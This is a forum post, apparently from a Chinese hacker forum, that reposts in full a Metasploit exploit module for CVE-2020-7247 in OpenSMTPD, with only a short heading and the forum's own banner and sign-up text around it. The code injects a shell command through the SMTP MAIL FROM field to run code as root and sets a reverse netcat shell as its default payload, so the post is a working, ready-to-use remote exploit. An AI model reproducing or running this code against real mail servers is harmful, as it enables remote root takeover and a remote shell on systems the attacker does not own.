• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

OpenSMTPD-来自远程代码执行漏洞的邮件


This Wind

Recommended Posts

发布内容作者:Metasploit                                              漏洞危害等级:critlow_4.gif〔严重〕

 

##<font></font>
# This module requires Metasploit: https://metasploit.com/download<font></font>
# Current source: https://github.com/rapid7/metasploit-framework<font></font>
##<font></font>
<font></font>
class MetasploitModule < Msf::Exploit::Remote<font></font>
<font></font>
  Rank = ExcellentRanking<font></font>
<font></font>
  include Msf::Exploit::Remote::Tcp<font></font>
  include Msf::Exploit::Expect<font></font>
<font></font>
  def initialize(info = {})<font></font>
    super(update_info(info,<font></font>
      'Name'           => 'OpenSMTPD MAIL FROM Remote Code Execution',<font></font>
      'Description'    => %q{<font></font>
        This module exploits a command injection in the MAIL FROM field during<font></font>
        SMTP interaction with OpenSMTPD to execute code as the root user.<font></font>
      },<font></font>
      'Author'         => [<font></font>
        'Qualys',                               # Discovery and PoC<font></font>
        'wvu',                                  # Module<font></font>
        'RageLtMan <rageltman[at]sempervictus>' # Module<font></font>
      ],<font></font>
      'References'     => [<font></font>
        ['CVE', '2020-7247'],<font></font>
        ['URL', 'https://www.openwall.com/lists/oss-security/2020/01/28/3']<font></font>
      ],<font></font>
      'DisclosureDate' => '2020-01-28',<font></font>
      'License'        => MSF_LICENSE,<font></font>
      'Platform'       => 'unix',<font></font>
      'Arch'           => ARCH_CMD,<font></font>
      'Privileged'     => true,<font></font>
      'Targets'        => [<font></font>
        ['OpenSMTPD >= commit a8e222352f',<font></font>
          'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars<font></font>
        ]<font></font>
      ],<font></font>
      'DefaultTarget'  => 0,<font></font>
      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}<font></font>
    ))<font></font>
<font></font>
    register_options([<font></font>
      Opt::RPORT(25),<font></font>
      OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root'])<font></font>
    ])<font></font>
<font></font>
    register_advanced_options([<font></font>
      OptBool.new('ForceExploit',   [false, 'Override check result', false]),<font></font>
      OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])<font></font>
    ])<font></font>
  end<font></font>
<font></font>
  def check<font></font>
    connect<font></font>
    res = sock.get_once<font></font>
<font></font>
    return CheckCode::Unknown unless res<font></font>
    return CheckCode::Detected if res =~ /^220.*OpenSMTPD/<font></font>
<font></font>
    CheckCode::Safe<font></font>
  rescue EOFError, Rex::ConnectionError => e<font></font>
    vprint_error(e.message)<font></font>
    CheckCode::Unknown<font></font>
  ensure<font></font>
    disconnect<font></font>
  end<font></font>
<font></font>
  def exploit<font></font>
    unless datastore['ForceExploit']<font></font>
      unless check == CheckCode::Detected<font></font>
        fail_with(Failure::Unknown, 'Set ForceExploit to override')<font></font>
      end<font></font>
    end<font></font>
<font></font>
    # We don't care who we are, so randomize it<font></font>
    me = rand_text_alphanumeric(8..42)<font></font>
<font></font>
    # Send mail to this valid recipient<font></font>
    to = datastore['RCPT_TO']<font></font>
<font></font>
    # Comment "slide" courtesy of Qualys - brilliant!<font></font>
    iter = rand_text_alphanumeric(15).chars.join(' ')<font></font>
    from = ";for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;"<font></font>
<font></font>
    # This is just insurance, since the code was already written<font></font>
    if from.length > 64<font></font>
      fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars')<font></font>
    elsif (badchars = (from.chars & target['MyBadChars'])).any?<font></font>
      fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}")<font></font>
    end<font></font>
<font></font>
    # Create the mail body with comment slide and payload<font></font>
    body = "\r\n" + "#\r\n" * 15 + payload.encoded<font></font>
<font></font>
    sploit = {<font></font>
      nil                   => /220.*OpenSMTPD/,<font></font>
      "HELO #{me}"          => /250.*pleased to meet you/,<font></font>
      "MAIL FROM:<#{from}>" => /250.*Ok/,<font></font>
      "RCPT TO:<#{to}>"     => /250.*Recipient ok/,<font></font>
      'DATA'                => /354 Enter mail.*itself/,<font></font>
      body                  => nil,<font></font>
      '.'                   => /250.*Message accepted for delivery/,<font></font>
      'QUIT'                => /221.*Bye/<font></font>
    }<font></font>
<font></font>
    print_status('Connecting to OpenSMTPD')<font></font>
    connect<font></font>
<font></font>
    print_status('Saying hello and sending exploit')<font></font>
    sploit.each do |line, pattern|<font></font>
      send_expect(<font></font>
        line,<font></font>
        pattern,<font></font>
        sock:    sock,<font></font>
        timeout: datastore['ExpectTimeout'],<font></font>
        newline: "\r\n"<font></font>
      )<font></font>
    end<font></font>
  rescue Rex::ConnectionError => e<font></font>
    fail_with(Failure::Unreachable, e.message)<font></font>
  rescue Timeout::Error => e<font></font>
    fail_with(Failure::TimeoutExpired, e.message)<font></font>
  ensure<font></font>
    disconnect<font></font>
  end<font></font>
<font></font>
end<font></font>
<font></font>
# [2020-03-20]  #

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now